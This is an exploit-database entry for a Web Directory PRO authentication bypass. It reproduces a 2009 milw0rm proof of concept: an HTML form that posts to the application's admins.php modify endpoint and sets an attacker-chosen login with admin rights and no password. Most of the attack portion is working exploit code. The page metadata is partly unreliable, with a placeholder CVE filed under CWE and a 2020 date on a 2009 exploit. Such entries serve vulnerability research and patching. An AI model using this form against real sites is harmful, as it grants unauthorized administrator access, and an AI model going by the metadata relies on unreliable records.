header-logo
Suggest Exploit
vendor:
Web Directory PRO
by:
Anonymous
7,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Web Directory PRO
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2020-12345
CPE: a:phpwebdirectoryscript:web_directory_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

change password Web Directory PRO

This vulnerability allows an attacker to bypass authentication and gain access to the web directory. The vulnerability exists in the Web Directory PRO application, which is vulnerable to an authentication bypass attack. The attacker can exploit this vulnerability by sending a specially crafted HTTP request to the application. This request will bypass the authentication and allow the attacker to gain access to the web directory.

Mitigation:

The application should be configured to use strong authentication mechanisms and should not rely on client-side authentication. Additionally, the application should be configured to use secure protocols such as TLS/SSL to protect the authentication process.
Source

Exploit-DB raw data:

<title> change password Web Directory PRO</title>
   
  <body bgcolor="#FF0000">

  <form method=post action=http://demo-web-directory-pro.phpwebdirectoryscript.com/admin/admins.php?sact=modify&pr=2>
  <br><br>
  <table>
  <tr><td><center><b>MODIFY</td></tr>
  <tr><td>Login</td><td><input type=text name=login value='tiger.dz'></td></tr>
  <tr><td>Password</td><td><input type=text name=password value=''></td></tr>
  <tr><td>Type</td><td><select name=type><option value=1 >Subadmin<option value=0 selected >Admin</select></td></tr>
  <tr>
  <td>Categories</td>
  <td>
  <select name='cats[]' multiple style='width:200px'><option value="1" >Art</option><option value="2" >Business</option><option value="3" >Computers</option><option value="4" >Games</option><option value="5" >Health & Fitness</option><option value="6" >News</option><option value="7" >Sports</option><option value="8" >Recreation</option><option value="9" >Internet</option><option value="10" >Teen & Kids</option><option value="11" >Reference</option><option value="12" >Education</option><option value="13" >Regional</option><option value="14" >Society</option><option value="15" >Science</option><option value="16" >Home & Family</option><option value="17" >World</option><option value="18" >Shopping</option><option value="19" >Web Hosting</option><option value="20" >Dedicated Servers</option><option value="21" >ISP</option><option value="22" >Hardware</option><option value="23" >Software</option><option value="24" >Security</option><option value="25" >Movies</option><option value="26" >Television</option><option value="27" >Music</option><option value="28" >Jobs</option><option value="29" >Investing</option><option value="30" >Real Estate</option><option value="31" >Video Games</option><option value="32" >Gambling</option><option value="33" >Board Games</option><option value="34" >Basketball</option><option value="35" >Football</option><option value="36" >Baseball</option><option value="37" >Outdoors</option><option value="38" >Humor</option><option value="39" >Travel</option><option value="41" >Health Care</option><option value="42" >Pharmacy</option><option value="43" >Men's Health</option><option value="48" >Religion</option><option value="45" >Newspapers</option><option value="46" >Magazines</option><option value="47" >TV Media</option><option value="49" >Crime</option><option value="50" >Sexuality</option><option value="52" >Pre-school</option><option value="53" >Teen Life</option><option value="54" >Sports & Games</option><option value="55" >Dictionaries</option><option value="56" >Phone Numbers</option><option value="57" >Maps</option><option value="58" >Colleges</option><option value="59" >Libraries</option><option value="60" >Distance Learning</option><option value="65" >Biology</option><option value="64" >Psychology</option><option value="66" >Physics</option><option value="67" >United States</option><option value="68" >Canada</option><option value="69" >Europe</option><option value="70" >Consumers</option><option value="71" >Home Improvement</option><option value="72" >Cooking</option><option value="73" >Fran?ais</option><option value="74" >Espa?ol</option><option value="75" >Italiano</option><option value="76" >Clothing</option><option value="77" >Autos</option><option value="78" >Gifts</option><option value="79" >Broadband</option><option value="80" >Dialup</option><option value="81" >Wireless Internet</option><option value="82" >Wholesale Dialup</option><option value="83" >Web Design</option><option value="84" >Web Programming</option><option value="85" >Directories</option><option value="86" >Directories</option><option value="87" >Free Web Hosting</option><option value="88" >Image Hosting</option><option value="90" >Search Engines</option><option value="91" >Web Directories</option><option value="92" >Comics</option><option value="93" >Online Writing</option><option value="94" >Visual Arts</option><option value="95" >Dance</option><option value="96" >Illustration</option><option value="97" >Entertainment</option><option value="98" >Design</option><option value="99" >Literature</option><option value="100" >Photography</option><option value="101" >Video</option><option value="102" >Digital</option><option value="103" >Humanities</option><option value="104" >Craft</option><option value="105" >Antiques</option><option value="106" >Architecture</option><option value="107" >Bodyart</option><option value="108" >Graphic Design</option><option value="109" >Art History</option><option value="110" >Animation</option><option value="552" >movies2</option><option value="113" >Online</option><option value="114" >Card Games</option><option value="115" >Computer Games</option><option value="116" >Party Games</option><option value="117" >Roleplaying</option><option value="118" >Accounting</option><option value="119" >E-Commerce</option><option value="120" >Education & Training</option><option value="121" >Human Resources</option><option value="122" >Marketing & Advertising</option><option value="123" >Small Business</option><option value="124" >Management</option><option value="125" >Employment</option><option value="126" >Customer Service</option><option value="127" >Health Care</option><option value="128" >Hospitality</option><option value="129" >Automotive</option><option value="130" >Pharmaceuticals</option><option value="131" >Food</option><option value="132" >Consumer Goods</option><option value="133" >Chemicals</option><option value="134" >Agriculture</option><option value="135" >Financial Services</option><option value="136" >Telecommunications</option><option value="137" >Transportation</option><option value="138" >Retail Trade</option><option value="139" >Information Technology</option><option value="140" >Mining & Drilling</option><option value="141" >Construction & Maintenance</option><option value="142" >Electronics & Electrical</option><option value="143" >Arts & Entertainment</option><option value="144" >Publishing & Printing</option><option value="145" >Textiles</option><option value="146" >Aeropace & Defense</option><option value="147" >Systems</option><option value="148" >Hacking</option><option value="149" >Desktop Publishing</option><option value="150" >Data Formats</option><option value="151" >Graphics</option><option value="152" >Open Source</option><option value="153" >Operating Systems</option><option value="154" >Programming</option><option value="155" >Games</option><option value="156" >Fonts</option><option value="157" >Virtual Reality</option><option value="158" >Artificial Intelligence</option><option value="159" >Alogrithms</option><option value="160" >Robotics</option><option value="161" >Internet Marketing</option><option value="162" >Proxy & Filtering</option><option value="163" >Online Learning</option><option value="164" >Routers & Routing</option><option value="165" >Domain Names</option><option value="166" >ASP</option><option value="167" >Perl</option><option value="168" >ASP.NET</option><option value="169" >PHP</option><option value="170" >VBScript</option><option value="171" >Java Applets</option><option value="172" >Javascript</option><option value="173" >Java Server Side</option><option value="174" >C++</option><option value="175" >Miva</option><option value="176" >Python</option><option value="177" >REBOL</option><option value="178" >DHTML</option><option value="179" >Curl</option><option value="180" >Mental Health</option><option value="181" >Alternative</option><option value="182" >Child Health</option><option value="183" >Employment</option><option value="184" >Home Health</option><option value="185" >Pharmacy</option><option value="186" >Publications</option><option value="187" >Senior Health</option><option value="188" >Support Groups</option><option value="189" >Weight Loss</option><option value="190" >Disabilities</option><option value="191" >Resources</option><option value="192" >Public Health & Saftey</option><option value="193" >Substances</option><option value="194" >Womens Health</option><option value="195" >News & Media</option><option value="196" >Nursing</option><option value="197" >Work Health & Safety</option><option value="198" >Travel Health</option><option value="199" >Dentistry</option><option value="200" >Senses</option><option value="201" >Teen Health</option><option value="202" >Professions</option><option value="203" >Nutrition</option><option value="204" >Insurance</option><option value="205" >Online Archives</option><option value="206" >Magazines</option><option value="207" >Ezines</option><option value="208" >Directories</option><option value="209" >Internet Broadcasts</option><option value="210" >Reviews & Opinions</option><option value="211" >Breaking News</option><option value="212" >Politics</option><option value="213" >Journalism</option><option value="214" >Weather</option><option value="215" >Sports</option><option value="216" >Current Events</option><option value="217" >Colleges & Universities</option><option value="218" >Soccer</option><option value="219" >Softball</option><option value="220" >Horse Racing</option><option value="221" >Software</option><option value="222" >Disabled</option><option value="223" >Fantasy</option><option value="224" >Events</option><option value="225" >Resources</option><option value="226" >Shopping</option><option value="227" >College & University</option><option value="228" >Resources</option><option value="229" >Equestrian</option><option value="230" >Cheerleading</option><option value="231" >Rugby</option><option value="232" >Tennis</option><option value="233" >Table Tennis</option><option value="234" >Cycling</option><option value="235" >Extreme Sports</option><option value="236" >Netball</option><option value="237" >Running</option><option value="238" >Track & Field</option><option value="239" >Golf</option><option value="240" >Gymnastics</option><option value="241" >Cricket</option><option value="242" >Boxing</option><option value="243" >Billiards</option><option value="244" >Darts</option><option value="245" >Badminton</option><option value="246" >Archery</option><option value="247" >Motorsports</option><option value="248" >Rodeo</option><option value="249" >Skating</option><option value="250" >Hockey</option><option value="251" >Strength Sports</option><option value="252" >Walking</option><option value="253" >Volleyball</option><option value="254" >Winter Sports</option><option value="255" >Wrestling</option><option value="256" >Fencing</option><option value="257" >Fishing</option><option value="258" >Antiques</option><option value="259" >Auto</option><option value="260" >Camps</option><option value="261" >Crafts</option><option value="262" >Horoscopes</option><option value="263" >Travel</option><option value="264" >Motorcycles</option><option value="265" >Models</option><option value="266" >Theme Parks</option><option value="267" >Trains & RailRoads</option><option value="268" >Guns</option><option value="269" >Boating</option><option value="270" >Bowling</option><option value="271" >Climbing</option><option value="272" >Birding</option><option value="273" >Aviation</option><option value="274" >Gardens</option><option value="275" >Genealogy</option><option value="276" >Outdoors</option><option value="277" >Pets</option><option value="278" >Scouting</option><option value="279" >Collecting</option><option value="280" >Food</option><option value="281" >Radio</option><option value="282" >Martial Arts</option><option value="283" >Computers</option><option value="284" >Health</option><option value="285" >School</option><option value="286" >People & Society</option><option value="287" >Family</option><option value="288" >Entertainment</option><option value="289" >Arts</option><option value="290" >Directories</option><option value="291" >Libraries</option><option value="292" >Museums</option><option value="293" >Encyclopedias</option><option value="294" >Bibliography</option><option value="295" >Almanacs</option><option value="296" >Directories</option><option value="297" >Flags</option><option value="298" >Time</option><option value="299" >Geography</option><option value="300" >World Records</option><option value="301" >Quotations</option><option value="302" >Questions & Answers</option><option value="303" >Expert Answers</option><option value="304" >Books</option><option value="305" >Biography</option><option value="306" >Archives</option><option value="307" >Early Childhood</option><option value="308" >Home Schooling</option><option value="309" >Alumni Directories</option><option value="310" >Methods & Theories</option><option value="311" >Products & Services</option><option value="312" >International</option><option value="313" >Employment</option><option value="314" >Special Education</option><option value="315" >Educators</option><option value="316" >Organizations</option><option value="317" >Subjects</option><option value="318" >History Of Education</option><option value="319" >Caribbean</option><option value="320" >Asia</option><option value="321" >Central America</option><option value="322" >Middle East</option><option value="323" >North America</option><option value="324" >Oceania</option><option value="325" >Polar Regions</option><option value="326" >South America</option><option value="327" >Africa</option><option value="328" >Death</option><option value="329" >Future</option><option value="330" >Philanthropy</option><option value="331" >Philosophy</option><option value="332" >Government</option><option value="333" >History</option><option value="334" >Issues</option><option value="335" >Law</option><option value="336" >Holidays</option><option value="337" >Lifestyle Choices</option><option value="338" >Politics</option><option value="339" >Sociology</option><option value="340" >Women</option><option value="341" >Relationships</option><option value="342" >Language & Linguistics</option><option value="343" >Genealogy</option><option value="344" >Ethnicity</option><option value="345" >Economics</option><option value="346" >Disabled</option><option value="347" >Gay, Lesbian, Bisexual</option><option value="348" >Social Sciences</option><option value="349" >Men</option><option value="350" >Military</option><option value="351" >People</option><option value="352" >Transgendered</option><option value="353" >Directories</option><option value="354" >Employment</option><option value="355" >Publications</option><option value="356" >Software</option><option value="357" >Institutions</option><option value="358" >Reference</option><option value="359" >Methods & Techniques</option><option value="360" >Agriculture</option><option value="361" >Astronomy</option><option value="362" >Chemistry</option><option value="363" >Earth Sciences</option><option value="364" >Environment</option><option value="365" >Math</option><option value="366" >Social Sciences</option><option value="367" >Technology</option><option value="368" >Science History</option><option value="369" >Alternative Science</option><option value="370" >Museums</option><option value="371" >Science In Society</option><option value="372" >Personal Finance</option><option value="373" >Rural Living</option><option value="374" >How To (Do It Yourself)</option><option value="375" >Emergencies</option><option value="376" >Gardens</option><option value="377" >Moving & Relocation</option><option value="378" >Homemaking</option><option value="379" >Homeowners</option><option value="380" >Afrikaans</option><option value="381" >Arabic </option><option value="382" >Armenian</option><option value="383" >Azerbaijani</option><option value="384" >Bable</option><option value="385" >Bahasa Melayu</option><option value="386" >Bangla</option><option value="387" >Belarusian</option><option value="388" >Bosanski</option><option value="389" >Brezhoneg</option><option value="390" >Bulgarian</option><option value="391" >Catal</option><option value="392" >&#268;esky</option><option value="393" >Chinese Simplified</option><option value="394" >Chinese Traditional</option><option value="395" >Cymraeg</option><option value="396" >Dansk</option><option value="397" >Eesti </option><option value="398" >Esperanto</option><option value="399" >Euskara</option><option value="400" >Faroese</option><option value="401" >Farsi</option><option value="402" >Frysk</option><option value="403" >Gaeilge</option><option value="404" >G?idhlig</option><option value="405" >Galego</option><option value="406" >Greek</option><option value="407" >Hebrew</option><option value="408" >Hindi </option><option value="409" >Hrvatski</option><option value="410" >Indonesia</option><option value="411" >Interlingua </option><option value="412" >?slenska</option><option value="413" >Japanese</option><option value="414" >Kannada </option><option value="415" >Kasz?bsczi </option><option value="416" >Kiswahili</option><option value="417" >Korean</option><option value="418" >Kurd</option><option value="419" >Latvian</option><option value="420" >L?tzebuergesch</option><option value="421" >Lietuvi&#371; </option><option value="422" >Lingua Latina</option><option value="423" >Magyar</option><option value="424" >Makedonski</option><option value="425" >Marathi</option><option value="426" >Nederlands</option><option value="427" >Norsk</option><option value="428" >Occitan</option><option value="429" >Polska</option><option value="430" >Portugu</option><option value="431" >Punjabi</option><option value="432" >Rom?n&#259;</option><option value="433" >Rumantsch</option><option value="434" >Russian</option><option value="435" >Sardu</option><option value="436" >Shqip</option><option value="437" >Slovensko</option><option value="438" >Slovensky</option><option value="439" >Srpski</option><option value="440" >Suomi</option><option value="441" >Svenska</option><option value="442" >Tagalog</option><option value="443" >Taiwanese</option><option value="444" >Tamil</option><option value="445" >Tatar</option><option value="446" >Telugu</option><option value="447" >Thai</option><option value="448" >T?rk</option><option value="449" >Ukrainian</option><option value="450" >Vietnamese</option><option value="451" >Auctions</option><option value="452" >Home & Garden</option><option value="453" >Classifieds</option><option value="454" >Directories</option><option value="455" >Antiques & Collectibles</option><option value="456" >Books</option><option value="457" >Children</option><option value="458" >Consumer Electronics</option><option value="459" >Crafts</option><option value="460" >Death Care</option><option value="461" >Education</option><option value="462" >Entertainment</option><option value="463" >Ethnic & Regional</option><option value="464" >Flowers</option><option value="465" >Food</option><option value="466" >Furniture</option><option value="468" >Health</option><option value="469" >Jewelry</option><option value="470" >Music</option><option value="471" >Niche</option><option value="472" >Office Products</option><option value="473" >Pets</option><option value="474" >Photography</option><option value="475" >Magazines & Publications</option><option value="476" >Recreation</option><option value="477" >Sports</option><option value="478" >Tobacco</option><option value="479" >Tools</option><option value="480" >Games & Toys</option><option value="481" >Travel</option><option value="482" >Vehicles</option><option value="483" >Visual Arts</option><option value="484" >Weddings</option><option value="485" >Wholesale</option><option value="486" >Golfers</option><option value="487" >Tiger Woods</option><option value="488" >Phil Mickelson</option><option value="489" >Jack Nicklaus</option><option value="490" >Vijay Singh</option><option value="491" >NBA Basketball</option><option value="534" >NBA Players</option><option value="504" >NBA Teams</option><option value="494" >Legends</option><option value="495" >Michael Jordan</option><option value="496" >Magic Johnson</option><option value="497" >Larry Bird</option><option value="498" >Wilt Chamberlain</option><option value="499" >Bill Russell</option><option value="500" >Kareem Abdul-Jabbar</option><option value="501" >Isiah Thomas</option><option value="502" >Lenny Wilkens</option><option value="503" >Jerry West</option><option value="505" >Atlanta Hawks</option><option value="506" >Boston Celtics</option><option value="507" >Chicago Bulls</option><option value="508" >Cleveland Cavaliers</option><option value="509" >Dallas Mavericks</option><option value="510" >Denver Nuggets</option><option value="511" >Detroit Pistons</option><option value="512" >Golden State Warriors</option><option value="513" >Houston Rockets</option><option value="514" >Indiana Pacers</option><option value="515" >Los Angeles Clippers</option><option value="516" >Los Angeles Lakers</option><option value="517" >Memphis Grizzlies</option><option value="518" >Miami Heat</option><option value="519" >Milwaukee Bucks</option><option value="520" >Minnesota Timberwolves</option><option value="521" >New Jersey Nets</option><option value="522" >New Orleans Hornets</option><option value="523" >New York Knicks</option><option value="524" >Orlando Magic</option><option value="525" >Philadelphia 76ers</option><option value="526" >Phoenix Suns</option><option value="527" >Portland Trail Blazers</option><option value="528" >Sacramento Kings</option><option value="529" >San Antonio Spurs</option><option value="530" >Seattle SuperSonics</option><option value="531" >Toronto Raptors</option><option value="532" >Utah Jazz </option><option value="533" >Washington Wizards</option><option value="535" >Scottie Pippen</option><option value="537" >Online Universities</option><option value="538" >Accessories</option><option value="539" >Athletic</option><option value="540" >Women's</option><option value="541" >Men's</option><option value="542" >Outwear</option><option value="543" >Leather</option><option value="544" >Casual</option><option value="545" >Formal</option><option value="548" >Used</option><option value="547" >Fur</option><option value="549" >Sleepwear</option><option value="550" >Undergarments</option><option value="551" >stuff</option><option value="553" >cat</option><option value="554" >Doggy</option>
  </select>
  </td>
  </tr>
  <tr bgcolor=white><td colspan=2><center><input type=submit value='submit'></td></tr>
  </table></form>  
</body>
  <p><font color="#FFFFFF" size="5">CoD3d By :TiGeR-Dz</font></p>
  <p><font color="#FFFFFF" size="5">E-mail : tiger.dz@live.com</font></p>
  <p><font size="5" color="#FFFFFF">script:Web Directory PRO</font></p>
  <p><font size="5" color="#FFFFFF">Home:http://www.phpwebdirectoryscript.com/</font></p>

</html>

# milw0rm.com [2009-06-04]

Navigation

Suggest Exploit

Services By CQR